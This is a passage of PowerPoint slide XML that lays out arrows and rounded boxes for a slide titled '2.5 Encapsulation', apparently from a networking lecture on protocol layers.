            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011929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0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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6" name="object 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB659E5-ABAC-760A-B7CF-F886454052EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4171416" y="4073704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7" name="object 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF960863-59E9-45B5-9C39-849139EBA5FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3225647" y="1286055"/>
            <a:ext cx="576580" cy="3278504"/>
            <a:chOff x="3204209" y="1355598"/>
            <a:chExt cx="576580" cy="3278504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61861E7A-60B5-8309-2961-A5A983ADBB96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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088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56681743-6285-D7AB-B8AD-8FDE80166BEC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0" y="2990088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088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8" name="object 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBD638F7-41D4-00B1-69E8-E20EFEA5A51C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449803" y="1364617"/>
            <a:ext cx="85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51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97117C95-5C3B-3B81-C1FA-0425AF62E32E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1609142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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D62F2BB-5094-007A-DF7A-5DDAF1ACBD3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1852982"/>
            <a:ext cx="1454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" indent="-1905" algn="just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w e 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53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A2A799-259D-8476-72B2-AB7438634C4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429483" y="2828596"/>
            <a:ext cx="126364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  <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270"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a y e r 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2" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{821C9100-847A-E9E5-78CC-248DCEC5F4A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8122260" y="1290627"/>
            <a:ext cx="576580" cy="3276600"/>
            <a:chOff x="8100822" y="1360170"/>
            <a:chExt cx="576580" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AB2D14A-8440-5560-9306-3ACF491859D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564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7" name="object 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA25B9BC-44B4-D2DE-356C-5FE938BA1189}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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0" y="2988564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564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3" name="object 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52756DC1-0807-46C4-7828-C9D532B5DD4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="1246685"/>
            <a:ext cx="10668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254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 c a p s u l a t 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58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AE105D7-DC6C-364B-9B33-168637446694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="3929839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59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F9608C0-FC71-0F31-5E95-FE4D59B549AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="4173679"/>
            <a:ext cx="106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6" name="object 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{848E9DCB-D701-3B63-74A0-C68067019427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4777079" y="3828086"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="4755641" y="3897629"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF37831-E895-63BC-3C74-820D41ED7F0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4755641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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140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5" name="object 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA8DA179-9B19-C2B7-ACE8-AD232326B09F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4755641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0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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7" name="object 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A09987D-5C79-F9BF-7BF8-3966973DD3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4916017" y="4073704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8" name="object 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{719D58A6-7011-B4EE-6051-C62102A3BC98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5507076" y="3828087"/>
            <a:ext cx="2496820" cy="774700"/>
            <a:chOff x="5485638" y="3897630"/>
            <a:chExt cx="2496820" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="object 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5391EE-FD6D-F04A-E020-A00DEA88A5F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5485638" y="3897630"/>
              <a:ext cx="2496820" cy="774700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820" h="774700">
                  <a:moveTo>
                    <a:pt x="2367280" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367280" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417498" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458513" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486169" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486169" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458513" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417498" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367280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3" name="object 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB40F087-65B0-F3E4-A77C-0B2DF7F62BEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5485638" y="3897630"/>
              <a:ext cx="2496820" cy="774700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820" h="774700">
                  <a:moveTo>
                    <a:pt x="0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367280" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417498" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458513" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486169" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486169" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458513" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417498" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367280" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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9" name="object 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56D26910-9B29-6F80-10A5-A0FEA285964D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5672810" y="4073704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68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8985276-67EE-385D-A485-05761AE04B67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4766534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41" name="object 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5EC5743-7C2F-D8B9-19BE-23DA5AB5B97A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4777180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46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034115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B6F4BDC-3224-B40C-BC6A-C291945A0CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432714" y="185345"/>
            <a:ext cx="33032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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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F8883D35-1FA7-FBCA-A38C-0E904D86073B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="1097078"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="1166621"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B747AB-5899-8981-3795-AD4A81F2C4B6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7" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D3EB7A-1747-722E-AEAD-62E5BAD8F94D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B8F560ED-6CFB-B3D3-DC5A-6A57D7DACD02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="1181102"/>
            <a:ext cx="20078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6A8911CA-D99B-3560-968D-F40500904BA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2009955"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2079498"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48FFE86B-B653-5B5B-3F42-3BF22BD396E0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00763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5" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FEE4A65-418D-E6CA-C988-95C783CE47E6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8" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42570EF-E251-0F88-F441-3F45CBD5C64D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="2095298"/>
            <a:ext cx="17030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35" dirty="0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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2843D18C-5BBA-10AE-C08F-EF9D11D12809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2924355"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2993898"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DBB473C-B5A8-C5D6-B8E2-37F8BBF4DF8E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3" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E204BF25-CEA2-1E2A-F117-46A55727BA70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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A65E39AE-5D53-7793-E849-128994BC16AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3008378"/>
            <a:ext cx="15392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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B7FF99D-8FD5-28EA-AFEB-5D85631881BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="3837231"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="3906774"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD19713B-850B-D5CD-8C8F-E08733CD9B19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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
